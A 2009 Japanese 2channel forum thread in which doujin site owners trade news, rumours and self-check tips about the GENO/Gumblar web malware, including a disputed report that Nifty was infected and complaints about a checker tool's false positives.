感染サイトを放置している奴が一番怖いよね
287GENO:2009/05/17(日) 17:05:44 ID:yenDHFuc0
>>268
公式で名前出てるとこあるんだから、そこ行けば。
288 :2009/05/17(日) 17:06:23 ID:5aeH/+QP0
>>282
今最新版を入れる気がないなら
騒ぎが落ち着いてからもインストールしないほうが精神衛生上いいよ
289GENO:2009/05/17(日) 17:07:44 ID:x5VmzG2VO
チェーンメール送ってるやつ、止めてくれよ。
290GENO:2009/05/17(日) 17:07:48 ID:rth+MTcW0
>>275
バスターとavast一緒に入れちゃったとかじゃないんだよね?
291GENO:2009/05/17(日) 17:09:24 ID:4ZaRXCle0
>>289
mixiの同人作家友の会コミュでチェーンメール貼り付けてトピ立てしてる奴がいたな
292GENO:2009/05/17(日) 17:09:52 ID:VSoz+7dXO
>>261
情報弱者と喜んで使いたがるヤツほど
同じ情報弱者だったりする法則
293GENO:2009/05/17(日) 17:10:02 ID:yOFHE6O/O
>>285
有難う
初心者用wikiにインストール方法書いてあるから入れなきゃダメなのかと思った
294GENO:2009/05/17(日) 17:10:18 ID:GEQ8HxWY0
ウイルスクリア使ってるんだけどウイルスクリアの人いないの?
他のソフトは何かしら情報出てるけどウイルスクリア全然出てこない気がする
295 :2009/05/17(日) 17:11:02 ID:5aeH/+QP0
そのコミュにmixi経由でも感染すると書くか
296GENO:2009/05/17(日) 17:11:28 ID:80ltjoJs0
へい、GENOウィルスことGumblarの報告してくれてるブログ
ttp://www3.atword.jp/gnome/tag/zlkon/
あと非同人向けまとめサイト
ttp://www29.atwiki.jp/geno/

参考にするだけで絶対にこちらに質問特攻掛けないこと!
297GENO:2009/05/17(日) 17:13:00 ID:ww2yFWjJ0
速報

【緊急】プロバイダニフティがプロバイダごとGENOウイルスに感染、会員とページアクセスした人全員終了
http://tsushima.2ch.net/test/read.cgi/news/1242547519/
298ジーノ:2009/05/17(日) 17:13:05 ID:en3OEJg6O
+にスレ立ったね
知名度上がるか?
299242:2009/05/17(日) 17:13:18 ID:M0g/u/hwO
>>290
AVASTは入ってないけどKingsoftAntivirusっての入ってる
300GENO:2009/05/17(日) 17:14:31 ID:k6wUL/5k0
ニフティ感染オワタ
301geno:2009/05/17(日) 17:14:38 ID:Rwww2B/g0
>>297
ぎゃあああああああああああああああ
302 :2009/05/17(日) 17:14:39 ID:5aeH/+QP0
406 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 17:06:33
>>399
ニフユーザーの中に感染サイトを立てている奴がいるってだけの話。
303GENO:2009/05/17(日) 17:15:02 ID:JgYHTftB0
>>294
フレッツウイルスクリア=バスターと思っていい
ver4=2009、ver3=2008、ver2=2007
v6は対応状況わからんからFVCサポセンにきいて
304geno:2009/05/17(日) 17:15:06 ID:AiED3JfY0
Kingsoftってあまり良い噂聞かないんだけど
305GENO:2009/05/17(日) 17:15:16 ID:Z5X0Hzy/0
流石に会員もってのはおかしくないか

そうだったら自分終わるがw
306GENO:2009/05/17(日) 17:15:52 ID:xlgEZVDB0
>>297
マジで?
まとめwikiにあるニフティのオンラインスキャンも危ないってこと?
307geno:2009/05/17(日) 17:16:45 ID:AiED3JfY0
>>297 プロパイだニフティだけどそれだけで感染するのか
308GENO:2009/05/17(日) 17:17:07 ID:OAjoiJXL0
>>297
昨日、ニフティのオンラインウイルスチェックやったんだけど、アウトなのか?
309 :2009/05/17(日) 17:17:22 ID:L5ZvU7R70
17 名前:名無しさん@ゴーゴーゴーゴー![sage] 投稿日:2009/05/17(日) 17:13:26 ID:yecXDdcQO
同人板、自分が一応安全だと分かったら普段の鬱憤を晴らすかのように叩きを始めてるのがいるね
これ以上被害を拡大させないことが大事なのに、正義厨の自分に酔った情弱叩きなんて何の役にも立たん
むしろそんなオナニーは有益なアドバイスを埋もれさせる害悪なんだと気づけ
310GENO:2009/05/17(日) 17:17:32 ID:HzC+xUvr0
会員はどういう経緯で感染するんだよw
311geno:2009/05/17(日) 17:17:57 ID:/3OwKYN30
>>297とそれにレスしてる単発共は煽り。
釣られるな
312GENO:2009/05/17(日) 17:18:14 ID:GEQ8HxWY0
>>303
d
今見たらsupported by TREND MICROになってたわ
手間かけてすまん
313g:2009/05/17(日) 17:18:16 ID:jpopUHeK0
うわ・・・ニフティ・・とんでもないな
314GENO:2009/05/17(日) 17:18:17 ID:B/lYlGwY0
>>173
超ありがとう
直撃だったよ
Wikiに出てないエラーはググったほうがいいんだな・・・
315GENO:2009/05/17(日) 17:18:23 ID:94GIamPZ0
ニフティ感染で焦ってる人、まずは落ち着いて自PCのなんやらかんやら確認すれ
感染してたらしてたで今までここでこうすればいいよっつってたことを実践するだけなんだから。
落ち着いていこうぜ
316GENO:2009/05/17(日) 17:18:41 ID:Z5X0Hzy/0
23 名前: セントランサス(アラバマ州)[sage] 投稿日:2009/05/17(日) 17:08:33.06 ID:+WQjtEdz
業務妨害でアウトな
ニフティがホスティングしてるサイトで感染が見つかってるってだけだから

---------------
だとよ
317geno:2009/05/17(日) 17:18:47 ID:ugI/Fqnf0
今genoチェックやったら、ニフティ900%だった・・・


ニフティ・・・
318GENO:2009/05/17(日) 17:19:27 ID:ww2yFWjJ0
>>317
まじで?w


一応ニュー速では真偽がはっきりしてない状態
釣りかどうかも確定してないんで用心ってことで
319geno:2009/05/17(日) 17:20:30 ID:xYIJLaYL0
今日午前ニフティのオンラインチェックした自分のパソコンは特に問題ありません
恐ろしくて一日に何度もcmd使ったチェックしていますが、
今の所バイト数に変化はありません

ただし、それ以降ニフティ関係には触れていないので安全とは言いきれませんが
320GENO:2009/05/17(日) 17:20:41 ID:75zIIRdD0
うわ画像も改竄されるのか…!
新しい画像に差し換えられるのか感染サイト内部のに限られるのか
記事読んでる限りではちょっとはっきりしないけどどうなんだろう?
321GENO:2009/05/17(日) 17:21:09 ID:9LeFd5x0O
今まさにニフティオンラインスキャンやってるんだがどうなんだ…?
オンラインスキャンのページはセーフ?それとも今すぐスキャン中止すべき?
322GENO:2009/05/17(日) 17:21:27 ID:aFSXgdTD0
感染URLはヲチ板へお願いします

【同人限定】GENOウイルス感染サイトヲチスレ
ttp://pc11.2ch.net/test/read.cgi/net/1242526238/
323GENO:2009/05/17(日) 17:21:38 ID:Mk4tVeWS0
とりあえず

お ち つ け
324GENO:2009/05/17(日) 17:21:52 ID:tznnOLLq0
>>298
また小林製薬の事しか話題にしてないな・・・
そんなもんみてないからおkぐらいの反応でこのままdata落ちすると思う・・・
325 :2009/05/17(日) 17:22:12 ID:L5ZvU7R70
18 名前:名無しさん@ゴーゴーゴーゴー![] 投稿日:2009/05/17(日) 17:18:56 ID:izyy9jWH0
同人板すげー呑気だな
2chで1、2を争う低次元なスレだと言うのに

19 名前:名無しさん@ゴーゴーゴーゴー![sage] 投稿日:2009/05/17(日) 17:20:52 ID:S3RM4SPa0
どうしてアプリをCドライブに入れちゃ駄目なの?って素でわからんような連中だからしょうがない

20 名前:名無しさん@ゴーゴーゴーゴー![sage] 投稿日:2009/05/17(日) 17:21:01 ID:WosJuOA/0
みんな病気だ。暖めあおうぜ。

21 名前:名無しさん@ゴーゴーゴーゴー![sage] 投稿日:2009/05/17(日) 17:21:20 ID:jshLAXzA0
で、呑気にヲチしてるお前等は何なの
326GENO:2009/05/17(日) 17:22:16 ID:ox2gtZ+c0
昨日ニフティのオンラインスキャンにアクセスしちゃったけど
Acrobat ReaderとFlash最新版にした後だったと思うから平気かな
327geno:2009/05/17(日) 17:22:31 ID:hP+SO8Rd0
>>319
自分も今日午前にオンラインチェックしたよ。
こっちも今の所cmd確認したけど変化なし。
328GENO:2009/05/17(日) 17:22:36 ID:EISHhTCv0
ググッても大丈夫ですか?先読みなんたらで駄目なんですか?な人は、
携帯版googleでも使えばいいんじゃないかな。携帯からは感染しないっつってんだし。
分からない用語調べるくらいなら十分でしょ。

サイズが**だ…アウト?っていう人は、まとめサイトに書いてある数値と一致するか確認。
もし違ったとしても、ここで訊いて何になるの?大丈夫ですよ!って言ってほしいの?
そんなんだったら知恵袋行って質問してこい。みんな親切に大丈夫ですよ!って言ってくれるから。
自分の質問したいことが過去レスにあるか調べたいなら、Ctrl+Fで該当単語抽出。
専ブラ使ってるなら内容絞り込みでも使えばいいじゃん。
329GENO:2009/05/17(日) 17:23:18 ID:ksg3AVup0
もうなんかここまで話がでかくなってくると笑えてきたw
バックアップとりおわったら素直にネット断ちしてケータイ厨になるわ
330GENO:2009/05/17(日) 17:24:03 ID:EISHhTCv0
ID:L5ZvU7R70
で?
331ジーノ:2009/05/17(日) 17:24:03 ID:en3OEJg6O
どうして自分でよく調べもせず脊椎反射で
うわあああああ、とか、とんでもないな、とか
言うの?
何で不確定情報を煽るの?
バカなの?死ぬの?
332GENO:2009/05/17(日) 17:24:10 ID:nLYhQYYe0
ttp://geno.2ch.tc/は使うのあまり薦めない方がいいんじゃないかな
いくつかのURLで試してみたら誤検知率が異様に高かった
アクセス解析とかjsの位置とかで真っ白なソースまで真っ黒判定されてる
まだテスト中の段階だって事は分かってはいるんだけど
これだけじゃ感染してないところにも言いがかりがついたり
混乱や風評被害も招きかねないから
現状ではここ使った結果での報告は自重した方がよさそう

面倒でもttp://so.7walker.net/guide.phpから直にソース見た方がいい
どんなソースが怪しいかはまとめに載ってる
333GENO:2009/05/17(日) 17:24:11 ID:AeGlZRwi0
さっきニフティ行ってその後sqlsodbc.chm見たけど異常なかった
ちなみにvista
334317:2009/05/17(日) 17:24:21 ID:ugI/Fqnf0
ごめん、今ソースチェックしてきたけど、やっぱりGENOが何処にいるのかわからない
不審なタグが見つからないんだ

あとGENOウイルスチェッカーだと、J-COMが2%でOCNは6%だった
あんまウイルスチェッカーは信用しない方がいいんだろうな・・・落ち着こう
335geno:2009/05/17(日) 17:24:32 ID:S0k/XHY70
>>319
同じくチェック今日午前にチェックしたがなんともなかった
けどcmdチェックも一応やっとくか
336GE:2009/05/17(日) 17:24:45 ID:Yb+6ZBob0
流れ早いから、誘導用

同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
http://www40.atwiki.jp/gegegeno/
何をすれば良いか良く分からない人用のまとめ

■よくある質問>>1
■主な症状 >>5
■自ジャンルで発見した場合
→まとめページを見て、重複がない場合は>>4

※まとめサイトの方が拾いやすいように、
まとめサイトへの報告他は、必ず>>1
アンカーを入れて報告してください。

GENOウィルスことGumblarの報告してくれてるブログ
ttp://www3.atword.jp/gnome/tag/zlkon/
あと非同人向けまとめサイト
ttp://www29.atwiki.jp/geno/

参考にするだけで絶対にこちらに質問特攻掛けないこと!
337GENO:2009/05/17(日) 17:24:53 ID:LCGyHUY90
>>330
NGに放り込め
338報告:2009/05/17(日) 17:25:27 ID:Kt5F63ReO
>1
テイルズで急速に拡大中

デスティニーで3
デスティニー2で1
シンフォニアで7
アビスで24 ←ヤバいってレベルじゃ(ry
ヴェスペリアで2
イノセンスで1

とりあえずこれだけ確認
アヴァさん大激怒ですよorz
このうち9割がボカロ、ヘタリアも取り扱ってるサイトだった

そして自分もクリンインスコ中
サイト作ろうと思ってたけどやめてよかったわw
339名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 17:26:01 ID:S0k/XHY70
ttp://so.7walker.net/guide.php

アクセス制限かかってるな
ちなみに自分はocn
340GENO:2009/05/17(日) 17:26:02 ID:80ltjoJs0
たしかに注釈とかいれてたり
独自のメモ書きとか入ってるソースにやたら反応するね>チェッカー

とりあえずnifty検索用ポータルのとことオンラインスキャンのところは
アクセスしても問題ないはず
341geno:2009/05/17(日) 17:26:13 ID:YTQWI9820
>>338
自ジャンル…orz
342NET裏技専門店:2009/05/17(日) 17:26:20 ID:x9ftetIq0
NET裏技専門店ってサイトがGENOに感染してる
343GENO:2009/05/17(日) 17:26:53 ID:k9txHb4E0
ざっとチェッカーにかけてみた

www.ニフ.com 900%

homepage.ニフ.com 5%
video.ニフ.com 5%
www.cocolog-ニフ.com 5%
kids.ニフ.com 0%
www.ニフ.co.jp 0%
enter.ニフmail.jp/webmail/ 0%
344GENO:2009/05/17(日) 17:26:59 ID:ww2yFWjJ0
>>338
トン

テイルズもきたか…まだ自ジャンル大丈夫だけど
ゲーム関連だから心配だ
345geno:2009/05/17(日) 17:28:06 ID:KbhiGpol0
>>316が答えでしょ。
てかわざと煽ってる人がいるんだよなあ。迷惑だよ。。
346GENO:2009/05/17(日) 17:28:58 ID:WZQN5UgD0
当方vista、数日前にniftyのデイリーポータルとトップ→キッズページ見たけど感染してない
今は行ってないからどうなってるかわからんけど
ちなみにセキュリティはプロバイダで入ってるウイルスバスター
347GENO:2009/05/17(日) 17:29:47 ID:k9txHb4E0
ニフのオンラインスキャンだが
www.ニフ.com/security/vcheck/ は0%なのでたぶん大丈夫
348GENO:2009/05/17(日) 17:29:47 ID:Qk4iTuLX0
genoチェッカは「安全度0%」に関しては信じてもいいかもしれない。

だが疑いがあるアドレスに関しては、900%でも信用すんな
javascriptコードがソース内にあるだけって場合がほとんど

ニフティのに釣られて騒いでる奴は、
張られたスレの1の書き込み内容の日付見て来い
不安なのもわかるが、これじゃ本当に釣り堀状態だよ……
349GENO:2009/05/17(日) 17:30:08 ID:aRPChaoi0
>>262
その通り
言葉が足りなくてごめん
過去ログとかhtmlを自動生成するCGIもあるし、考え出したら本当に頭痛いな
サイトにGENO注意喚起もしたいけど、
とりあえずFTP入ってるフラッシュメモリは抜きっぱにするわ
350GENO:2009/05/17(日) 17:30:50 ID:UGf3Ld1K0
>>338
テイルズのどのサイトが感染したんだよ
URLも貼ろうぜ
351GENO:2009/05/17(日) 17:31:24 ID:V3bBl/2a0
あのチェッカー、作ってくれた人には悪いけど
いっそのこと外してしまった方がよくない?
余計に混乱や不安を煽ってるだけな気がするよ
今まで「効果があった」という報告も見てないし
352げの:2009/05/17(日) 17:31:29 ID:CqbD49hO0
>>345
そらν速は前の騒ぎの際に短縮URL投下でZIP厨が一人失業したしなぁw
353GENO:2009/05/17(日) 17:31:38 ID:jWbaELA40
ネット絶ちしつつもときどき2chで情報収集しながら原稿。これ最強
354GENO:2009/05/17(日) 17:32:01 ID:AIHCMWTk0
>>348
プロバイダとかが感染すると、ネットに接続するだけで感染してあぼんとか
そういう恐ろしい想像しか詣でてこなくなってきたよw
googleつないだらアウトとかな
こえー
355GENO:2009/05/17(日) 17:33:10 ID:m5tzz3000
てかさっきからURL微妙に伏せて書いてる奴らうざい
URL伏せなくていいから!URL書くなら普通に書け!
356GENO:2009/05/17(日) 17:33:14 ID:yvGZdY1I0
バスター2008の最終アップデートのバージョンは6.13300でおk?
357GENO:2009/05/17(日) 17:33:20 ID:+7fu+S0I0
>>338
できれば>>322
セキュ板が検体をほしがっているらしい
358GENO:2009/05/17(日) 17:33:31 ID:WZQN5UgD0
>>351
「0%ならとりあえず安全、数値が出たら可能性がある(ただし無害なJavaScriptの場合もあるので確定はできない)」
って注意書きをつけておくといいんじゃないかな
359geno:2009/05/17(日) 17:33:55 ID:xYIJLaYL0
>>319のものです >>308さんへの返信のつもりだったのですがアンカ付け忘れとか馬鹿すぎます
皆さん便乗報告有難うございます。安心できました

しかし、テイルズ危なくなってきましたね。扱っているので用心しないと
やはり休日なので自サイトを更新しようとする方が多いので、感染が拡大
しやすいのでしょうね
自分も更新しようと意気込んでいたのですが……。
丁度いいからウィルスの感染防止記事でも貼り付けとこう
360GENO:2009/05/17(日) 17:34:01 ID:9LeFd5x0O
ニフティオンラインスキャンのページGENOウイルスチェッカーで0%だったが
ニフティのホームは900だった
つまりオンラインスキャンはセーフか?
361geno:2009/05/17(日) 17:34:13 ID:AiED3JfY0
プロパイだniftyだがniftyのサイトは数年見てない。レジストリエディタはちゃんと起動するぞ
362GENO:2009/05/17(日) 17:34:14 ID:yenDHFuc0
>>357
乙女ゲーの公式行けって。感染したままらしいから。
363GENO:2009/05/17(日) 17:36:01 ID:tg7x4LOj0
自ジャンルリンクしてたサイトが感染してた…
まとめにもう出てるジャンルだから出さないけどこう身近に感染が見つかると一気に怖くなるな

その感染した人が自サイト鯖とは別のレンタル鯖(Fc2とか)のブログを更新するのはセーフ?
なにがFTPでなにがFTPなのかよくわからん
364名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 17:36:02 ID:SsvMmXpe0
ソースチェッカにニフのを通してみたが、特にやばそうなコードは見当たらなかった。
GENOチェッカーは多分、空白とかリンクのURLを意味不明な文字列>geno疑いあり、と判断してるっぽいね。
365geno:2009/05/17(日) 17:36:43 ID:9wncY9JGO
サイトで注意喚起している管理人は好感が持てるけど、チェーンメール回してくる管理人は最悪だ
気が動転してるのかもしれないが落ち着いてくれ…
366geno:2009/05/17(日) 17:37:31 ID:Rwww2B/g0
>>340
てことはscriptタグとコメントアウトの存在を重視して、
中身をしっかり見てるってわけではないっぽい?
367GENO:2009/05/17(日) 17:38:53 ID:+7fu+S0I0
>>362
だから亜種があるから一つでも多く検体がほしいんだってば
368GENO:2009/05/17(日) 17:39:23 ID:Mk4tVeWS0
チェッカーは「ヤバイサイト」を判別するってよりも
「大丈夫なサイト」かどうかを見きわめるために使うのがいいんじゃない?

0%ならとりあえずそのページについては大丈夫、ってことで
369GENO:2009/05/17(日) 17:39:31 ID:4M1l0+yy0
>>362
種類が必要なんだろ
それで済むなら いちいちここにお願いに来ない
370GENO:2009/05/17(日) 17:39:54 ID:tg7x4LOj0
>>363
○→なにがFTPでなにがFTPじゃないのかよくわからん

気が動転してた
FFFTPがFTPってことはさすがにわかるが
371名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 17:40:44 ID:m17qGKa+0
検体検体検体ってうっせーな
名前あがってるジャンルをかたっぱしから自分で見てまわれよ
372GENO:2009/05/17(日) 17:41:49 ID:LCGyHUY90
>>367
だからそんなに検体欲しいなら同人サイトまわれ
せっかく感染しているジャンルが出てるんだからそこまわれば確実だろ
ボカロは特に対策が進んでないと思われ。
373GENO:2009/05/17(日) 17:42:32 ID:yenDHFuc0
>>369
名前挙がってるジャンルのサーチを探せばいいだろうに。
374GENO:2009/05/17(日) 17:42:33 ID:mw7PFJNB0
検体たくさん欲しいやつは該当ジャンルのサーチ回ればいいんじゃね
375GENO:2009/05/17(日) 17:42:36 ID:90KykFF00
ftpd動かしてるサーバは脆弱すぎ。かなり前からもうFTP使うのやめる方向に動いてるのに。
SCPで完全に代用できるのに。そんな貸鯖屋使っちゃだめだよ。
利用者もWinSCPつかうべきだ。
376GENO:2009/05/17(日) 17:42:57 ID:4M1l0+yy0
>>371
登録サーチにある数百のサイトの中から
Java使いまくったお前らの趣味のページを
TOPページからHTMLをまんべんなくチェックするんだぞ

発見したら報告してもらう方がよっぽど合理的
377GENO:2009/05/17(日) 17:43:35 ID:eFDA7FA60
>>360
だと思う
http://www.nifty.com/security/vcheck/kav/kavwebscan.html
ここは0%だった
そしてニフティのTOPは900%感染
378GENO:2009/05/17(日) 17:43:40 ID:80ltjoJs0
>>366
あー…わからん
そこまでしっかり統計出した訳じゃないんで
ただ高い数値が出てソースのぞいて見るとなんのこっちゃない
比較的ぐちゃぐちゃしてるだけとか独自性のあるjavascriptとかにも反応してる

今回のは比較的ソース開くと一発でこれか!ってわかりやすいんだけどね
379geno:2009/05/17(日) 17:43:44 ID:CVXgkb/j0
>>342
まじでか!?
危ない危ない・・
検索してるとよく出てくるよあのサイト
380GENO:2009/05/17(日) 17:43:59 ID:M9mNfIZHO
>>367
随分と他力本願なんだな
381GENO:2009/05/17(日) 17:44:07 ID:P1sFp9qa0
GENOチェッカーは確かにちょっと混乱させる結果とレスの方が多いな…
管理人さんまだここ見てるかな
382GENO:2009/05/17(日) 17:44:12 ID:mw7PFJNB0
>>376
それすら面倒ならやらなくていいよ
発見したやつが個々にノートンとかに送ればいいだけの話だ
383GENO:2009/05/17(日) 17:44:21 ID:yenDHFuc0
>>376
私怨で無関係なサイトを晒すアホが常駐してる板でそんなこと言っても無駄。
384名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 17:44:22 ID:cJ8T4uoE0
3日前初めて覗いたサイトが今日になってサイト感染してましたってお詫びがでてた
cmd.exeもレジエディタもサイズもおkだけど怖いワァ
385GENO:2009/05/17(日) 17:44:47 ID:8BxiMwcD0
>>370
ブラウザ上からアップロードできるものはFTP関係ないから大丈夫だよ
386GENO:2009/05/17(日) 17:44:50 ID:EBSzFkV20
>>376
>>222だってよ
もう用は済んだな
387GENO:2009/05/17(日) 17:45:08 ID:VfsTosQI0
>>376
自分がやりたくないから他人にやらせようってのか
388ID:4M1l0+yy0は帰れ:2009/05/17(日) 17:45:15 ID:m17qGKa+0
236 名前:GENO[] 投稿日:2009/05/17(日) 16:46:15 ID:4M1l0+yy0
>>190
ここだとファびょるんだよな でも検体は欲しい
ヲチかインターネット・セキュリティ関連の板に
感染したHPを無差別にひたすら晒していくそういう専用スレ立てて欲しい

268 名前:GENO[sage] 投稿日:2009/05/17(日) 16:58:07 ID:4M1l0+yy0
>>254-255
黙ってさっさとファイル消した結果として 今蔓延してんだろ
明日から月曜だから急いでるんだよ

369 名前:GENO[sage] 投稿日:2009/05/17(日) 17:39:31 ID:4M1l0+yy0
>>362
種類が必要なんだろ
それで済むなら いちいちここにお願いに来ない

376 名前:GENO[sage] 投稿日:2009/05/17(日) 17:42:57 ID:4M1l0+yy0
>>371
登録サーチにある数百のサイトの中から
Java使いまくったお前らの趣味のページを
TOPページからHTMLをまんべんなくチェックするんだぞ
発見したら報告してもらう方がよっぽど合理的
389GENO:2009/05/17(日) 17:46:12 ID:k6wUL/5k0
>>384
ジャンルは
390geno:2009/05/17(日) 17:46:39 ID:9wncY9JGO
>>376
クレクレ厨は同人板でもどの板でも最下層の困ったちゃん
391geno:2009/05/17(日) 17:46:45 ID:F3VlOqPh0
>>384
未出ジャンルならジャンル名だしてくれ
392ゲノ:2009/05/17(日) 17:47:10 ID:en3OEJg6O
>>376
だから、ここで呼びかけても有用な情報は集まらんよ
なにがウイルスかわかってる奴少ないから
自分で探した方が早いよ?
393GENO:2009/05/17(日) 17:47:11 ID:pP66j2Vo0
チェッカーで、危険度6パーってどうなの?
踏んでもまぁ良しってことだよね…
394GENO:2009/05/17(日) 17:47:41 ID:os1adUJy0
>>376
>Java使いまくったお前らの趣味のページ

だからJavaじゃなくってJavascriptだっつの。
せめて今日くらい区別つけろ。
395GENO:2009/05/17(日) 17:47:41 ID:+7fu+S0I0
すでに発見した人に協力を呼びかけているだけなのだが……
もちろん無理強いはしないよ
396GENO:2009/05/17(日) 17:47:58 ID:zkRYNLl00
自力で回るかもしくは捨てアド晒して感染URL募集してみれば?>検体
この場で晒すってことに抵抗のある人が多いみたいだし
申告したURLが周りに見えないようにすれば提供者も出てくるかもよ
まあノイズも大量に入ってくるだろうけどそこは頑張れ
397GENO:2009/05/17(日) 17:48:05 ID:WZQN5UgD0
>>377
>>348>>358>>368参照
398GENO:2009/05/17(日) 17:48:44 ID:yenDHFuc0
399GENO:2009/05/17(日) 17:49:40 ID:Qk4iTuLX0
GENOチェッカはティアラや成美堂などの感染サイトは1000%出すけど、
長文スクリプトずらずら書いてりゃウイルス関係無くても900%なるっぽ

0%→大丈夫
1000%→真っ黒
それ以外→自分でソース確認してから踏んでね、ってとこだね

ニフティもヘタリアのサーチも冤罪だし、
GENOチェッカーが混乱させてる部分が少なからずあるなあ
400GENO:2009/05/17(日) 17:49:51 ID:Bb48tNaQO
便乗荒らしに構うやつも荒らしですよー
401名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 17:50:04 ID:ciML7RXN0
GENOウィルスよりもこのスレの話題の無限ループのほうが怖くなってきたわ
まだ読めるのに何故過去ログを読まないのか
402GENO:2009/05/17(日) 17:50:06 ID:G5ZQ6xeC0
自サイトをGENOチェッカーで試してたけど
うっかり存在しないURL入れ間違えてても危険度0%だった。
本当に信用できるか疑問・・。
403名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 17:50:36 ID:d3gTGmBA0
>377
ニフティのトップって「http://www.nifty.com/」←これ?
特に何もなかったよ。avastも反応しないし,NoScriptを
使っても,それらしいJavaScriptの類いはない。
ソース見たらJavaScriptのコードが多いんで,間違って
判定したんじゃないかな。
404名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 17:51:18 ID:cJ8T4uoE0
>>389
>>391
既出ジャンルだけど戦国ばさら
ソース覗いたけど綺麗になってたよ
405GENO:2009/05/17(日) 17:51:20 ID:MdmaeeAB0
検体欲しい人は何なの?それでワクチン作れちゃうつもりなの?
同人板だってことわかってここに来てるんだよねぇ?
ただ集めたいだけなら自分でやれよ。研究者だって、金払って人使うか自分で集めるっつーの。
406geno:2009/05/17(日) 17:51:22 ID:TYMPcO5S0
>>402
上でも出てるけど存在しないURLは漏れなく0%になるっぽい
そらまあ存在しないんだから安心に違いないだろう
407geno:2009/05/17(日) 17:51:24 ID:oOpvy1oI0
@にふてぃのスキャン今gkbrしながら行ってみた
js許可しないとできないんだな
408GENO:2009/05/17(日) 17:51:39 ID:koWqgx6a0
>>370
FTPクライアント(HTML作成ソフトに付属してるものも含む)で単独にサーバにアクセスして
ファイルをアップロードしたり、アクセス権の設定できたりするのがFTP

オエビとかブログとかブラウザから直接編集したりアップロードするのは通常はFTPじゃない

ただ、ブラウザを利用したFTPっていうのもある
アドレスが ftp://〜 ではじまるのがそれ
普通に趣味で使う同人者には縁がないと思う

という理解をしているんだが、間違ってたらだれか修正して欲しい
409GENO:2009/05/17(日) 17:51:41 ID:cF2U0T8qO
>>402
そもそも存在しないなら安全だよ
410GENO:2009/05/17(日) 17:51:55 ID:iTFvKUsT0
FTPからファイルマネージャでの更新に切り替えればおk?
411GENO:2009/05/17(日) 17:51:56 ID:bHs6WITK0
検体検体言ってるが、単にどんなもんか見てみたい阿呆か、
一般の掲示板やスレに貼付けて人に踏ませて遊びたい愉快犯か
ウイルス作ってみたいやつか
のどれかだろ

馬鹿は放置しとけ
412GENO:2009/05/17(日) 17:52:16 ID:tg7x4LOj0
>>385
ありがとう

とりあえず自分は大丈夫みたいだが万が一が怖いのでしばらく更新はFFFTPじゃなく
ブラウザ上から直接やるよ
413GENO:2009/05/17(日) 17:52:24 ID:ksYpQU9t0
人に作ってもらって運営だけしてるサイト持ちだが、
今回の騒動に慌てたものの初心者過ぎてwiki見てもなにがなんだかわからない
javascriptって何?firefoxって何?というレベル

とにかくPCが感染していないのは確かめたんだが、
それとサイトが感染していないかどうかはまた別の話?
414GENO:2009/05/17(日) 17:52:38 ID:g28b4SZP0
感染してない事を確認したサイトのURL入れたら300%越えました<GENOチェッカー
悪いけど今の状況を考えたらこの精度で使うのは微妙かも
415Geno:2009/05/17(日) 17:52:41 ID:2DBZ68RU0
416GENO:2009/05/17(日) 17:53:12 ID:WW4U/KOD0
>>413
いくら馬鹿でもまとめの初心者の方は分かるでしょうよ
417GENO:2009/05/17(日) 17:53:55 ID:RNqd4lsF0
>>413
運営している人に聞けばいいじゃん
418GENO:2009/05/17(日) 17:53:59 ID:F9m+rLAN0
>>413
そのまま回線切ればいいと思うよ
419GENO:2009/05/17(日) 17:54:24 ID:94GIamPZ0
>>413
PCに異常がないならサイトに感染している可能性は低いかもしれない
サイトが感染していたらPCには確実に感染している
そんだけ
420GENO:2009/05/17(日) 17:54:31 ID:JzP1VTbK0
>オエビとかブログとかブラウザから直接編集したりアップロードするのは通常はFTPじゃない

オネエとかブログとかブラザーから直接編集したりアップロードするのは通常はFTPじゃない
に見えたので少し寝てくるw
421GENO:2009/05/17(日) 17:55:04 ID:Xnb6IfnL0
>>413
サイト作っててそのレベルとは心底呆れる
422geno:2009/05/17(日) 17:55:15 ID:rPGIPHzV0
PC詳しくない母や弟には、「騒ぎが落ち着くまでネットしないでね」でおk?
423geno:2009/05/17(日) 17:55:19 ID:9wncY9JGO
>>405
検体検体言ってる奴はよくいる可哀想なプログラマー気取りだから…
424geno:2009/05/17(日) 17:55:36 ID:FINc61IMO
これって感染すると、システム用じゃないDドライブにも影響出る?
Cは死んでもいいんだがDには夏コミで出すファイルとエロ画像が
425GENO:2009/05/17(日) 17:56:01 ID:yenDHFuc0
>>422
うちは父親にそう言っといた。
426GENO:2009/05/17(日) 17:56:08 ID:80ltjoJs0
GENOチェッカー不安なら

ttp://so.7walker.net/guide.php

の一番上にURLいれるところ有るからリンク先のアドコピペして
ソースを覗くが良いさ(ただ規制かかりやすいが)

すると数字とアルファベットが文脈もなく密集してるようなJavascriptが何行も続いてるのを
見つけることが有るだろう>そいつがビンゴですよ
試しにヲチ板の方に来てたり報告上がってるゲームサイトを見てご覧
427geno:2009/05/17(日) 17:56:17 ID:P4y+Uyoo0
もしかして分からない人用まとめって意味ない?
正直あのまとめ蛇足だし、ここの質問者は減らないし、頼むから読んでください…
428GENO:2009/05/17(日) 17:57:15 ID:gfSPhhas0
ここまで来ると全ウェブサイト終焉の時も近いな…
429geno:2009/05/17(日) 17:57:28 ID:VLep97Za0
win98なんだけど、sqlsodbc.chmがどう探しても見つからない。
sqlsodbc.hlpならあるんだけど…。

スキャン、DOSなど他の方法ではウイルスらしきものは何も見つからなかった。
430geno:2009/05/17(日) 17:57:34 ID:Il+SPzcZO
>>422
感染したサイト見ただけでパソコンに感染する新種のウイルス大流行してるから、パソコンしないでね
ってカーチャンに言ったら分かってくれた
431GENO:2009/05/17(日) 17:57:54 ID:G5ZQ6xeC0
GENOウィルスチェッカー製作者さん、サイト入れても
チェックされないんですけど。
432GENO:2009/05/17(日) 17:58:07 ID:t1IrKqqI0
>>367
よく分からないんだけど
感染したサイトのURLを集めてウイスルバスターかどこかに送ると
早くワクチンを作ってくれるってこと?
433GENO:2009/05/17(日) 17:58:17 ID:WW4U/KOD0
>>427
えっ?
すごく親切に作ってあって
PCサイトの作り方すら分からない自分のような情弱でも理解できたよ
